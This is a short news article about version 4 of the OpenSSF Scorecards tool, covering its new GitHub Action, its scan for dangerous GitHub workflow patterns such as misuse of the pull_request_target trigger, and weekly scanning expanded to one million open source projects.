The Open Source Security Foundation (OpenSSF) has released version 4 of its Scorecards initiative, which was launched by GitHub and Google. Scorecards is an automated security solution for open source projects that flags dangerous supply chain activities. This update includes a new Scorecards GitHub Action, improved security checks, and a significant increase in the number of repositories scanned weekly by the foundation.
Scorecards are a set of scans that analyse and assess a project’s security policies. These scans verify that the project is free of checked-in binaries, that branch protection is in place, that code review is necessary, and that releases are cryptographically signed. The project repo has a complete list of accessible scans. When the tool is run, it generates a score for each specific security practise ranging from 0 to 10, as well as an overall score for the project.
The new Scorecards GitHub Action makes it easier to use the tool. The Scorecards workflow is preconfigured to execute automatically on each contribution once the Action is in place. The results are automatically transmitted to GitHub’s code scanning alerts API and show in the security tab of the code scanning alerts dashboard. This is an improvement over prior versions, which required the tool to be launched manually.
In GitHub Actions workflows, this version adds a new scan for risky code patterns. This is the first risk that has been assigned a critical level. In GitHub workflows, the scan detects improper use of the pull request target trigger as well as the possibility of script injections. When the pull request target workflow trigger is combined with an explicit checkout of an untrusted PR, the repository can be hacked.
Weekly scans of major open source projects are also conducted by the Scorecards team. The number of direct dependents on these projects is used to identify them. The number of projects being scanned has increased from 50,000 to one million with this edition. The 0-10 rating scale provided in the self-applied scanning tool is now mirrored in these weekly scans. The OpenSSF Security Metrics dashboard, the Scorecards API, a BigQuery public dataset, and the Open Source Insights websites all make these results available.
On GitHub, you can find OpenSSF Scorecards. The GitHub Action process can be used by public repositories as a code scanning API, and 1,000 Actions minutes per month are free for all public projects on GitHub.